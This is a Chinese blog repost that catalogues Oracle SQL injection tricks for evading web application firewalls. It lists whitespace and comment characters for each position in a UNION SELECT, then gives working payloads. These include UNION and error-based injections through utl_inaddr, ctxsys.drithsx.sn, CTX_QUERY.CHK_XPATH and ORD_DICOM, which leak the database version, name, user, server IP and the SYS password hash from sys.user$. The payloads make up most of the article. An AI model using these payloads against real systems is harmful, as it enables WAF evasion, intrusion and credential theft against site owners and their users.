waf旁路oracle客户端,WAF Bypass数据库特性(Oracle探索篇)

最新推荐文章于 2022-07-22 11:25:14 发布
最新推荐文章于 2022-07-22 11:25:14 发布
阅读量88 收藏
点赞数
文章标签: waf旁路oracle客户端

0x01 前言

我们经常利用一些数据库特性来进行WAF绕过。在Oracle中,比如可以这样:

空白字符:%00

获取数据库版本:SELECT banner FROM v$version where rownum=1

相比于Mysql/MSsql,它的特性相对较少,但确有其特殊之处,比如空白字符可以用%00替代,一个获取数据库版本的语句就这么长。一起去探索一下Oracle数据库特性,挖掘能够绕过WAF防护的数据库特性。

0x02 测试

常见有5个位置即:   SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【位置四】from【位置五】admin

位置一:参数和union之间的位置

1)空白字符

Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

2)注释符号/**/

3)其他字符

%2e  .   点号

位置二:union和select之间的位置

1)空白字符

Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

2)注释符号/**/

位置三:select和查询参数之间的位置

1)空白字符

Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

2)注释符号/**/

3)其他字符

%2b  +

%2d   -

%ad

select * from emp where mgr=7782   union select+NULL,(SELECT banner FROM v$version where rownum=1),NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL

位置四:查询参数和from之间的位置

1)空白字符

Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

2)注释符号/**/

位置五:from后面的位置

1)空白字符

Oracle中可以利用的空白字符有: %00  %09 %0a  %0b %0c  %0d  %20

2)注释符号/**/

0x03 函数

类型一:常见函数

SELECT banner FROM v$version where rownum=1   //获取数据库版本

select user from dual where rownum=1          //获取当前连接数据库的用户名

select password from sys.user$ where rownum=1 and name='SYS'  //获取用户SYS密文密码

SELECT name FROM v$database                   //获取库名

select table_name from user_tables where rownum=1   //获取第一个表名

Tips:在oracle 里|| 是连接符号,但是在其他数据库里就不是

id=1 and 1=2 union select (chr(94)||chr(94)||chr(33)||(SELECT banner FROM v$version where rownum=1)||chr(33)||chr(94)||chr(94)) from dual--

类型二:显错注入

?id=1 AND 1=utl_inaddr.get_host_address((SELECT name FROM v$database))—  //获取库名

?id=1 and 1=ctxsys.drithsx.sn(1,(select UTL_INADDR.get_host_address from dual where rownum=1))-- //获取数据库服务器所在ip

?id=1 and 1= CTXSYS.CTX_QUERY.CHK_XPATH((select banner from v$version where rownum=1),'a','b')--

?id=1 Or 1=ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select banner from v$version where rownum=1),'a','b')--

?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null—

?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual))--

0x04 END

本文汇总了一些常见的Oracle数据库特性和常见的数据库函数,仅作抛砖引玉之用,欢迎留言,顺便分享一下你了解的比较有意思的特性。

转载自公众号:Bypass

张静姝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
防火墙旁挂,策略路由引流
weixin_34001430的博客
04-04 1万+
1、案例拓扑图 2、核心设备AR2的主要配置 2.1AR2#acl number 2000 rule 5 permit source 192.168.1.0 0.0.0.255 //匹配需要过滤的路由#traffic classifier liu operator orif-match acl 2000#traffic behavior liuredirect ip-nexthop 2.1.1...
WAF支持多种灵活的部署方式
wdt3385的专栏
09-29 3996
WAF支持多种灵活的部署方式,根据其工作方式原理不同可以分为在线方式、离线方式和冗余方式。从其设备在网络的位置看,通常放在企业对外提供网站服务的DMZ区域或者放在数据中心服务区域,也可以与FireWall或IPS(这种情况较少)等串联在一起。用户可以根据自己的需求采用不同的工作方式以及放置在不同的位置灵活部署。 在线方式 在线方式又可分为3种工作模式:透明代理模式、反向代理模式、路由代理模式。
(46.3)【WAF绕过】基于WAF的规则绕过、旁路、云waf、白名单
05-13 1128
WAF绕过】针对规则绕过
WAF的基础理解
qq_45377063的博客
07-22 1250
WAF的定义 WAF(web应用防火墙),对于应用层HTTP流量的检测与防护,也是对于常见的OWASP风险进行防护的安全设备。 WAF与防火墙、IPS的区分度 防火墙是位于互联网入口的第一道防线,它主要负责OSI模型中二层到四层的防护,四到七层的防护很微弱。 防病毒软件是在五层到七层起作用。 为了弥补防火墙和防病毒软件对四层到七层防护的空缺,IPS应运而生。 WAF的部署方式 代理和镜像 串联、旁路和反向代理都是起代理的作用 镜像拉取只有告警作用,并不能防护 串联:部署简单,但流量都得从它身上过,容易出现单
Oracle 注入bypass总结(艰难的心路历程)
weixin_42508548的博客
11-24 1708
文前先感谢大家的支持,上Oracle数据库注入总结想着后续学习一下如何进行利用,getshell的,奈何技术还太菜了,再加上项目压力大,所以就慢慢搁置了。这里先出一bypass的,文中仅针对Oracle数据库,但是bypass手法我认为万变不离其宗,思想上是通用的,希望能够对大家有所帮助。 0x01 环境准备 一、安装Oracle数据库 1、首先下载数据库安装软件 具体可以从参考这里,我是从他的百度云下载的Windows10下安装Oracle 11g_勿忘初心的博客-CSDN博客_win10安装o
WAF6.X-旁路部署.doc
08-07
旁路检测模式,顾名思义,就是只检测,不阻断的模式,此模式部署,WAF只能记录攻击+访问日志,不能对数据包进行阻断处理; 旁路检测+阻断,就是指交换机配置镜像流量给WAFWAF既能监测,又能阻断的部署方式。具体原理是:交换机把镜像流量给WAFWAF检测到有攻击后,给服务器发送RST数据包,告诉服务器有攻击,服务器则丢弃此数据包; 反向代理模式:由WAF作为代理服务器
WAF Bypass数据库特性Oracle探索).pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
第03WAF Bypass数据库特性Oracle探索)1
08-03
0x02 测试位置一:参数和union之间的位置1)空白字符Oracle中可以利用的空白字符有: %00 %09 %0a %0b %0c %0d %202)注释
WAF Bypass数据库特性(Access探索).pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
WAF Bypass数据库特性(MSsql探索).pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
WAF Bypass数据库特性(Mysql探索).pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
WAF基本原理与部署方式
曹世宏的博客
06-14 5万+
WAF介绍 WAF是什么? WAF的全称是(Web Application Firewall)即Web应用防火墙,简称WAF。 国际上公认的一种说法是:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 WAF常见的部署方式: WAF常见部署方式 WAF一般部署在Web服务器之前,用来保护Web应用。 那么WAF能做什么? WAF可以过滤HTTP/HTTPS协议流量,防护Web攻击。 WAF可以对Web应用进行安全审计 WAF可以防止CC攻击 应用
安全观察:浅谈WAF几种常见的部署模式
Enweitech Software Works
07-14 4万+
随着电子商务、网上银行、电子政务的盛行,WEB服务器承载的业务价值越来越高,WEB服务器所面临的安全威胁也随之增大,因此,针对WEB应用层的防御成为必然趋势,WAF(WebApplicationFirewall,WEB应用防火墙)产品开始流行起来。 WAF产品按照形态划分可以分为三种,硬件、软件及云服务。软件WAF由于功能及性能方面的缺陷,已经逐渐被市场所淘汰。云WAF近两年才刚刚兴起,产品
WAF安全应用防火墙
Grosso27的博客
06-21 739
WAF的定义Web应用防护系统(又称:网站应用级入侵防御系统 。英文:WebApplication Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对http/https的安全策略来专门为Web应用提供保护的一款产品。 WAF可以阻止黑名单的IP访问,并把白名单中不需要的URL进行过滤。它支持User-Agent的过滤,并且能匹配自定义规则中的条目,...
WAF Bypass数据库特性Oracle探索
07-01 326
0x01 背景 oracle与mysql特性类似,半自动化fuzz了一下,记录成果。 0x02 测试 位置一:参数和union之间的位置 1)空白字符 Oracle中可以利用的空白字符有:%00%09%0a%0b%0c%0d%20 2)注释符号/**/ 3)其他字符 %2e . 点号 位置二:union和select之间的位置 1)空白字...
FW/IDS/IPS/WAF等安全设备部署方式及优缺点
热门推荐
chenyulancn的专栏
12-29 6万+
现在市场上的主流网络安全产品可以分为以下几个大类: 1.基础防火墙FW/NGFW类 主要是可实现基本包过滤策略的防火墙,这类是有硬件处理、软件处理等,其主要功能实现是限制对IP:port的访问。基本上的实现都是默认情况下关闭所有的通过型访问,只开放允许访问的策略。FW可以拦截低层攻击行为,但对应用层的深层攻击行为无能为力。 FW部署位置一般为外联出口或者区域性出口位置,对内外流量进
WAF应用防火墙
HHH's Blogs
06-03 3948
WAF学习笔记: 技术攻击: (OWASP Top-10) SQL Injection 参考http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 什么时候可能发生SQL Injection:假设我们在浏览器中输入URLwww.sample.com,由于它只是对页面的简单请求无需对数据库动进行动态...
oracle 简单处理空白符
Raney_Yang的专栏
10-17 973
WITH TAB AS (SELECT '1 1' ID --含有中英文空格,制表符 FROM DUAL UNION ALL SELECT '1 2' ID --含有回车 FROM DUAL), TAB2 AS (SELECT '11' ID FROM DUAL UNION ALL SELECT '12' ID FROM DUAL) SELECT T.
关于防火墙旁挂的问题
luoyunjie123456789的博客
01-07 9230
实验拓扑: 实验环境: PC1: IP:192.168.1.1 网关地址:192.168.1.254 PC2: IP:192.168.2.2 网关地址:192.168.2.254 R1: G0/0/0:192.168.1.254 G0/0/1:192.168.2.254 g0/0/2:12.1.1.1 g4/0/0::13.1.1.1 FW3:g0/0/0:12.1.1....
绕过waforacle时间盲注
06-06
绕过WAFOracle时间盲注可以考虑以下几个方面: 1. 使用不同的时间函数:WAF通常会限制sleep或dbms_lock.sleep等常用的时间函数,可以尝试使用其他的时间函数如sysdate、systimestamp等。 2. 调整延时时间:可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值